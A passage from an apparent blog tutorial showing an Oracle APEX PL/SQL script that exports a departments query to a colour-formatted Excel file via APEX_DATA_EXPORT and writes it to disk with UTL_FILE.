    p_header_font_color => '#FFFFFF', -- White
    p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
    p_body_font_family => apex_data_export.c_font_family_times,
    p_body_bg_color => '#40E0D0', -- Turquoise
    p_body_font_color => '#191970' -- MidnightBlue
);        

Note that, according to the documentation, GET_PRINT_CONFIG will also accept HTML colour names or RGB codes.

Anyway, the script is called excel_print_config.sql :

set serverout on size unlimited
clear screen

declare
        cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_context apex_exec.t_context;
   
    v_print_config apex_data_export.t_print_config;
    v_export apex_data_export.t_export;    

    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'crayons.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
begin


    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike'
    );

    v_stmnt := 'select * from departments';
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    
    
    -- Let's do some formatting.
    -- OK, let's just scribble with the coloured crayons...
    v_print_config := apex_data_export.get_print_config
    (
        p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
        p_header_font_weight => apex_data_export.c_font_weight_bold, --  Default is "normal"
        p_header_font_color => '#FFFFFF', -- White
        p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
        p_body_font_family => apex_data_export.c_font_family_times,
        p_body_bg_color => '#40E0D0', -- Turquoise
        p_body_font_color => '#191970' -- MidnightBlue
    );        

    -- Specify the print_config in the export
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx,
        p_print_config => v_print_config
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
    
    utl_file.fclose( v_fh);

    dbms_output.put_line('File written to HR_REPORTS');
    
exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/    

…and the resulting file is about as garish as you’d expect…

On the off-chance that you might prefer a more subtle colour scheme, you can find a list of HTML colour codes here.

Pages